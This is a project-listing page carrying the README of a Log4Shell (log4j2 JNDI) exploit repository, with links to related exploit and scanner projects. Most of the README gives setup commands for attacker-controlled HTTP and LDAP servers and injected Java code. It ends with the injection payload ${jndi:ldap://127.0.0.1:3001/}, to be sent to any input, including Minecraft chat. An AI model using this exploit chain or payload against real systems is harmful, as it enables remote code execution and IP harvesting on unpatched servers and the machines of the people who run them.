All Projects → ilsubyeega → log4j2-rce-exploit

ilsubyeega / log4j2-rce-exploit

Licence: other
log4j2 remote code execution or IP leakage exploit (with examples)

Programming Languages

java
68154 projects - #9 most used programming language
javascript
184084 projects - #8 most used programming language

Projects that are alternatives of or similar to log4j2-rce-exploit

logmap
Log4j jndi injection fuzz tool
Stars: ✭ 60 (-3.23%)
Mutual labels:  log4j2, log4shell
log4shell-finder
Fastest filesystem scanner for log4shell (CVE-2021-44228, CVE-2021-45046) and other vulnerable (CVE-2017-5645, CVE-2019-17571, CVE-2022-23305, CVE-2022-23307 ... ) instances of log4j library. Excellent performance and low memory footprint.
Stars: ✭ 22 (-64.52%)
Mutual labels:  log4j2, log4shell
CVE-2019-8449
CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4
Stars: ✭ 66 (+6.45%)
Mutual labels:  exploit, cve
dirtycow
radare2 IO plugin for Linux and Android. Modifies files owned by other users via dirtycow Copy-On-Write cache vulnerability
Stars: ✭ 93 (+50%)
Mutual labels:  exploit, cve
CVE-2019-10149
CVE-2019-10149 : A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.
Stars: ✭ 15 (-75.81%)
Mutual labels:  exploit, cve
PatrowlHearsData
Open-Source Vulnerability Intelligence Center - Unified source of vulnerability, exploit and threat Intelligence feeds
Stars: ✭ 66 (+6.45%)
Mutual labels:  exploit, cve
Log4jPatcher
A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer)
Stars: ✭ 43 (-30.65%)
Mutual labels:  log4j2, log4shell
Gitlab rce
RCE for old gitlab version <= 11.4.7 & 12.4.0-12.8.1 and LFI for old gitlab versions 10.4 - 12.8.1
Stars: ✭ 104 (+67.74%)
Mutual labels:  exploit, cve
Exploits
A personal collection of Windows CVE I have turned in to exploit source, as well as a collection of payloads I've written to be used in conjunction with these exploits.
Stars: ✭ 75 (+20.97%)
Mutual labels:  exploit, cve
vulristics
Extensible framework for analyzing publicly available information about vulnerabilities
Stars: ✭ 46 (-25.81%)
Mutual labels:  exploit, cve
minecraft-log4j-honeypot
Minecraft Honeypot for Log4j exploit. CVE-2021-44228 Log4Shell LogJam
Stars: ✭ 89 (+43.55%)
Mutual labels:  exploit, cve
log4jshield
Log4j Shield - fast ⚡, scalable and easy to use Log4j vulnerability CVE-2021-44228 finder and patcher
Stars: ✭ 13 (-79.03%)
Mutual labels:  log4j2, log4shell
inthewilddb
Hourly updated database of exploit and exploitation reports
Stars: ✭ 127 (+104.84%)
Mutual labels:  exploit, cve
pwn-pulse
Exploit for Pulse Connect Secure SSL VPN arbitrary file read vulnerability (CVE-2019-11510)
Stars: ✭ 126 (+103.23%)
Mutual labels:  exploit, cve
cve-2016-1764
Extraction of iMessage Data via XSS
Stars: ✭ 52 (-16.13%)
Mutual labels:  exploit, cve
PocOrExp in Github
聚合Github上已有的Poc或者Exp,CVE信息来自CVE官网。Auto Collect Poc Or Exp from Github by CVE ID.
Stars: ✭ 544 (+777.42%)
Mutual labels:  exploit, cve
Vulmap
Vulmap 是一款 web 漏洞扫描和验证工具, 可对 webapps 进行漏洞扫描, 并且具备漏洞利用功能
Stars: ✭ 1,079 (+1640.32%)
Mutual labels:  exploit, cve
Cve 2019 0708 Tool
A social experiment
Stars: ✭ 87 (+40.32%)
Mutual labels:  exploit, cve
CVE-2021-41773 CVE-2021-42013
Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE
Stars: ✭ 20 (-67.74%)
Mutual labels:  exploit, cve
HackLog4j
《HackLog4j-永恒之恶龙》致敬全宇宙最无敌的Java日志库!Tribute to the most invincible Java logging library in the universe!
Stars: ✭ 161 (+159.68%)
Mutual labels:  log4j2, log4shell

log4j2-exploits

2021-12-11.12-17-44.mp4

This fundamental vulnerability was reported by CVE-2018-3149 and patched by this article. (8u121 Release Notes)

However, the logging library for java called log4j2 had JNDILookup, which allowed access to protocols such as LDAP, which allowed code injection in older java versions.

Patched versions of java can prevent code injection, but JNDILookup makes request to ldap server, which can lead to IP leaks.

The solution is to update Java and log4j2 versions.

Running

  1. Install requirements
cd http-server && npm install
cd ldap-server && npm install
  1. run http-server and ldap-server both
cd http-server && node index.js
cd ldap-server && node index.js
  1. Compile Main.java
# This will generate Main.java - required to code injection.
javac Main.java
  1. Start jvm with parameters
# You can still use log4j-client in repo for internal testing.
cd log4j-client
gradlew jar
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar build/libs/log4j-client-1.0-SNAPSHOT.jar
# Or run other application, com.sun.jndi.ldap.object.trustURLCodebase=true required for code injection, otherwise it will only request to ldap server.
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar [yourJar].jar
  1. Send ${jndi:ldap://127.0.0.1:3001/} to any payloads. (In minecraft, just chatting this will work if exploits are working.)

References

License

CC0

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].